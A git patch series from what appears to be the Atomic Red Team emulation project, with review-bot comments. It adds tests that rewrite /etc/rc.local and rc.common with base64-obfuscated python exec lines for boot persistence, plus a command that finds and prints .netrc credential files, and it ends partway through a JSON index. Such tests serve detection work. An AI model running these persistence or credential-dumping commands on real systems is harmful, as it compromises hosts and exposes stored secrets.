From cec771d64f0dc6c4464b247e58b835c0fcbcc49a Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Sat, 29 May 2021 14:54:22 -0700 Subject: [PATCH 01/11] Add test for T1037.004 that modifies rc.local and rc.common files on Linux --- atomics/T1037.004/T1037.004.yaml | 37 ++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml index 8b664b82..9ec58a6f 100644 --- a/atomics/T1037.004/T1037.004.yaml +++ b/atomics/T1037.004/T1037.004.yaml 
@@ -15,3 +15,40 @@ atomic_tests: elevation_required: true name: bash + +- name: rc.common + description: | + Modify rc.common + + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common + sudo chmod +x /etc/rc.common + cleanup_command: | + origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi + +- name: rc.local + description: | + Modify rc.local + + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local + sudo chmod +x /etc/rc.local + cleanup_command: | + origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi + From b19ac6e34e088a8461c9287fbbd033c554d5c27f Mon Sep 17 00:00:00 2001 
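Review bot: Both cleanup_command lines restore file content but not file mode: `sudo chmod +x` is run on the live /etc/rc.local (and /etc/rc.common), and `sudo cp $origfilename /etc/rc.local` over an existing file keeps the destination's executable bit, so an rc.local that was not executable before the test remains executable after cleanup — on systemd hosts that bit is what the rc-local generator keys on, so the cleanup can leave the boot configuration changed. Use `sudo cp -p $filename /etc/rc.local.original` for the backup and `sudo cp -p $origfilename /etc/rc.local` for the restore so the original mode travels with the content, and guard the backup with `[ ! -f /etc/rc.local.original ]` so a second run before cleanup cannot overwrite the only copy of the original. The descriptions (`Modify rc.common` / `Modify rc.local`) should also say what the opaque base64 does — it is a python3 one-liner that writes /tmp/T1037.004.rc.common or /tmp/T1037.004.rc.local when the script executes at boot — and python3 should be declared under `dependencies`, since nothing in the command checks that it exists.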
From: madhavbhatt Date: Sat, 29 May 2021 22:48:31 -0700 Subject: [PATCH 02/11] Update T1037.004.md : Atomic Doc Generated using bin/generate-atomic-docs.rb --- atomics/T1137.004/T1137.004.md | 102 ++++++++++++++++++++++++++------- 1 file changed, 81 insertions(+), 21 deletions(-) diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md index 858ef875..5e258a38 100644 --- a/atomics/T1137.004/T1137.004.md +++ b/atomics/T1137.004/T1137.004.md @@ -1,45 +1,105 @@ -# T1137.004 - Outlook Home Page -## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/004) -
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page) +# T1037.004 - RC Scripts +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004) +
Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. -Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page) -
+Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. + +Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) + +Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
## Atomic Tests -- [Atomic Test #1 - Install Outlook Home Page Persistence](#atomic-test-1---install-outlook-home-page-persistence) +- [Atomic Test #1 - rc.common](#atomic-test-1---rccommon) + +- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon) + +- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal)
-## Atomic Test #1 - Install Outlook Home Page Persistence -This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. +## Atomic Test #1 - rc.common +Modify rc.common -Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). +[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) -**Supported Platforms:** Windows +**Supported Platforms:** macOS -#### Inputs: -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | string | file://PathToAtomicsFolder\T1137.004\src\T1137.004.html| -| outlook_version | Version of Outlook that is installed | string | 16.0| -| outlook_folder | Name of the Outlook folder to modify the homepage setting for | string | Inbox| + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) -#### Attack Commands: Run with `command_prompt`! +```bash +sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common +``` -```cmd -reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f + + + + +
+
+ +## Atomic Test #2 - rc.common +Modify rc.common + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi +printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common +printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common +sudo chmod +x /etc/rc.common ``` #### Cleanup Commands: -```cmd -reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f +```bash +origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi +``` + + + + + +
+
+ +## Atomic Test #3 - rc.local +Modify rc.local + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi +printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local +printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local +sudo chmod +x /etc/rc.local +``` + +#### Cleanup Commands: +```bash +origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi ``` From ae62a04dedb99cc5db98f9b5250ef833de3a1c1b Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Tue, 1 Jun 2021 20:12:17 -0700 Subject: [PATCH 03/11] T1552.001 : Find and Access Unsecured Github Credentials in File --- atomics/T1552.001/T1552.001.md | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md index 300e9199..33589071 100644 --- a/atomics/T1552.001/T1552.001.md +++ b/atomics/T1552.001/T1552.001.md @@ -16,6 +16,8 @@ In cloud and/or containerized environments, authenticated user and service accou - [Atomic Test #4 - Access unattend.xml](#atomic-test-4---access-unattendxml) +- [Atomic Test #5 - Find and Access Github Credentials](#atomic-test-5---find-and-access-github-credentials) +
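Review bot: This hunk is applied to the wrong file: the diff header names `atomics/T1137.004/T1137.004.md` (Outlook Home Page), yet every removed line is the Outlook page and every added line is the T1037.004 RC Scripts page, so the commit deletes the Outlook Home Page documentation instead of updating the RC Scripts one — the target should be `atomics/T1037.004/T1037.004.md`. Since the later `CircleCI Atomic Red Team doc generator` commits in this series regenerate the .md pages from the YAML anyway, dropping this hand-generated commit entirely is the safer fix. Separately, the regenerated page lists two tests both titled `rc.common` (#1 macOS, #2 Linux); giving the new YAML test a distinguishing name such as `rc.common (Linux)` would keep the index entries and anchors unambiguous.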
@@ -120,4 +122,28 @@ type C:\Windows\Panther\Unattend\unattend.xml +
+
+ +## Atomic Test #5 - Find and Access Github Credentials +This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. + +**Supported Platforms:** macOS, Linux + + + + + +#### Attack Commands: Run with `bash`! + + +```bash +for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done +``` + + + + + +
From 3f7ee8151e002e61c86e1287c14c4bac9465d573 Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Tue, 1 Jun 2021 20:39:26 -0700 Subject: [PATCH 04/11] T1552.001 : Find and Access Unsecured Github Credentials in File --- atomics/T1552.001/T1552.001.yaml | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/atomics/T1552.001/T1552.001.yaml b/atomics/T1552.001/T1552.001.yaml index 5bd597e8..6a2fc54e 100644 --- a/atomics/T1552.001/T1552.001.yaml +++ b/atomics/T1552.001/T1552.001.yaml @@ -51,4 +51,19 @@ atomic_tests: type C:\Windows\Panther\unattend.xml type C:\Windows\Panther\Unattend\unattend.xml name: command_prompt - elevation_required: true \ No newline at end of file + elevation_required: true + +- name: Find and Access Github Credentials + description: | + This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. + + supported_platforms: + - macos + - linux + + executor: + name: bash + elevation_required: false # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false. + command: | + for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done + From 2d54a45364530a325fd20357d3cef192910fa3f5 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Thu, 3 Jun 2021 13:44:31 -0700 Subject: [PATCH 05/11] Update Platforms and Executors for ATT&CKv9 Implement changes proposed in https://github.com/redcanaryco/atomic-red-team/issues/1491 --- atomic_red_team/atomic_red_team.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/atomic_red_team/atomic_red_team.rb b/atomic_red_team/atomic_red_team.rb index 46a1266c..24a4c811 100755 --- a/atomic_red_team/atomic_red_team.rb +++ b/atomic_red_team/atomic_red_team.rb 
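Review bot: The new command `for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done` word-splits find's output, so a .netrc under any path containing whitespace is broken into several bogus arguments, and `find /` without `-xdev` also walks /proc, /sys and every network mount, which makes the test slow and noisy on real hosts. A single find invocation avoids both problems: `find / -xdev -type f -name .netrc 2>/dev/null -print -exec cat {} \;`. The description is also inaccurate — .netrc is the generic login file read by curl, ftp and git's credential helpers and holds cleartext credentials for any `machine` entry, github.com being just one — and it is worth stating that with `elevation_required: false` only .netrc files readable by the current user are found. The template comment left after `elevation_required: false` should be removed.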
@@ -108,7 +108,7 @@ class AtomicRedTeam raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms') raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array) - valid_supported_platforms = ['windows', 'macos', 'linux'] + valid_supported_platforms = ['windows', 'macos', 'linux', 'office-365', 'azure-ad', 'google-workspace', 'saas', 'iaas', 'containers', 'iaas:aws', 'iaas:azure', 'iaas:gcp'] atomic['supported_platforms'].each do |platform| if !valid_supported_platforms.include?(platform) raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}") @@ -142,7 +142,7 @@ class AtomicRedTeam raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String) raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/ - valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual'] + valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud'] case executor['name'] when 'manual' raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps') @@ -152,7 +152,7 @@ class AtomicRedTeam string: executor['steps'], string_description: "atomic_tests[#{i}].executor.steps" - when 'command_prompt', 'sh', 'bash', 'powershell' + when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud' raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command') raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String) From bf0731c08028876d5fa9af21e7ed84cd997d2e9f Mon Sep 17 00:00:00 2001 
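Review bot: The three new executor names are accepted independently of the platform list, so a test declaring `executor.name: aws` with `supported_platforms: [windows]` still validates; if the intent behind adding `iaas:aws`, `iaas:azure` and `iaas:gcp` together with `aws`, `az` and `gcloud` is that cloud executors pair with a cloud platform, the validator should enforce it. A check after the existing `when` branch would do: `raise("atomic_tests[#{i}].executor.name '#{executor['name']}' requires a cloud supported_platform") if %w[aws az gcloud].include?(executor['name']) && (atomic['supported_platforms'] - %w[windows macos linux]).empty?`. The platform list here is ordered `iaas:aws, iaas:azure, iaas:gcp` while the spec.yaml comment added in the next commit lists `iaas:gcp, iaas:azure, iaas:aws`; keeping one order makes the two easier to compare. The enclosing validation method begins and ends outside these hunks, so I cannot see whether the `case` has an `else` that rejects unknown executor names.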
From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Thu, 3 Jun 2021 13:51:20 -0700 Subject: [PATCH 06/11] Updating spec for ATT&CKv9 Including changes noted in https://github.com/redcanaryco/atomic-red-team/issues/1491 --- atomic_red_team/spec.yaml | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/atomic_red_team/spec.yaml b/atomic_red_team/spec.yaml index 0f46a9c4..9ccd2b42 100644 --- a/atomic_red_team/spec.yaml +++ b/atomic_red_team/spec.yaml @@ -51,6 +51,15 @@ atomic_tests: # - windows # - macos # - linux + # - office-365 + # - azure-ad + # - google-workspace + # - saas + # - iaas + # - containers + # - iaas:gcp + # - iaas:azure + # - iaas:aws supported_platforms: - windows @@ -106,6 +115,7 @@ atomic_tests: # a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these # per test, but there are cases where you may have multiple - for example, separate executors for `sh` # and `bash` when working on linux OSes. + # Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, and `gcloud`. executors: # the name of the executor describes the framework or application in which the test should be executed. # From 753c1d59ee78c8999eff65b84623e4c1c6e5cf31 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 4 Jun 2021 17:12:47 +0000 Subject: [PATCH 07/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1543.002/T1543.002.md | 65 ---------------------------------- 1 file changed, 65 deletions(-) diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index 6f2f4e4b..c9bfec54 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md 
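Review bot: The added executor comment says cloud/container runtimes "such as" `aws`, `az` and `gcloud` can be used, but the validator in atomic_red_team.rb accepts exactly those three names and nothing else, so the spec should present them as the closed set rather than an open-ended example: `# Cloud/container CLIs are also valid executor names; the validator accepts exactly: aws, az, gcloud.` The same applies to the platform list — these comments are what contributors copy from, so they should match the validator's accepted values and order exactly.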
@@ -16,8 +16,6 @@ While adversaries typically require root privileges to create/modify service uni - [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service) -- [Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-unit-file--enable-the-service--modify-and-reload-the-service) -
@@ -77,67 +75,4 @@ systemctl daemon-reload -
-
- -## Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service. -This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. - -**Supported Platforms:** Linux - - - - - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - - -```bash -cat > /etc/init.d/T1543.002 << EOF -#!/bin/bash -### BEGIN INIT INFO -# Provides : Atomic Test T1543.002 -# Required-Start: $all -# Required-Stop : -# Default-Start: 2 3 4 5 -# Default-Stop: -# Short Description: Atomic Test for Systemd Service Creation -### END INIT INFO -python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))" -EOF - -chmod +x /etc/init.d/T1543.002 -if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ; -systemctl enable T1543.002 -systemctl start T1543.002 - -echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 -systemctl daemon-reload -systemctl restart T1543.002 -``` - -#### Cleanup Commands: -```bash -systemctl stop T1543.002 -systemctl disable T1543.002 -rm -rf /etc/init.d/T1543.002 -systemctl daemon-reload -``` - - - -#### Dependencies: Run with `bash`! -##### Description: System must be Ubuntu ,Kali OR CentOS. 
-##### Check Prereq Commands: -```bash -if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; -``` -##### Get Prereq Commands: -```bash -echo Please run these atomic tests from Ubuntu ,Kali OR CentOS. -``` - - - -
From 1f1a002d89edfcb4101aed55c1dad905a7826219 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 4 Jun 2021 17:14:19 +0000 Subject: [PATCH 08/11] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1037.004/T1037.004.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml index 9ec58a6f..6004b8b4 100644 --- a/atomics/T1037.004/T1037.004.yaml +++ b/atomics/T1037.004/T1037.004.yaml @@ -17,6 +17,7 @@ atomic_tests: - name: rc.common + auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: | Modify rc.common @@ -35,6 +36,7 @@ atomic_tests: origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi - name: rc.local + auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: | Modify rc.local diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 409c774d..e78c5f95 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -706,3 +706,5 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 0b2f9520-a17a-4671-9dba-3bd034099fff 28104f8a-4ff1-4582-bcf6-699dce156608 46f8dbe9-22a5-4770-8513-66119c5be63b +c33f3d80-5f04-419b-a13a-854d1cbdbf3a +126f71af-e1c9-405c-94ef-26a47b16c102 From 94d442bcd63fa9a8f802aecd8f0eaa7bd1157c79 Mon Sep 17 00:00:00 2001 
From: CircleCI Atomic Red Team doc generator Date: Fri, 4 Jun 2021 17:14:26 +0000 Subject: [PATCH 09/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 4 + atomics/Indexes/Indexes-CSV/linux-index.csv | 4 + atomics/Indexes/Indexes-Markdown/index.md | 4 + .../Indexes/Indexes-Markdown/linux-index.md | 8 +- atomics/Indexes/Matrices/linux-matrix.md | 4 +- atomics/Indexes/index.yaml | 84 +++++++++++++++ atomics/T1037.004/T1037.004.md | 68 ++++++++++++ atomics/T1137.004/T1137.004.md | 102 ++++-------------- 9 files changed, 194 insertions(+), 86 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 31d2834b..fbe9e18a 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"
techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"te
chniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
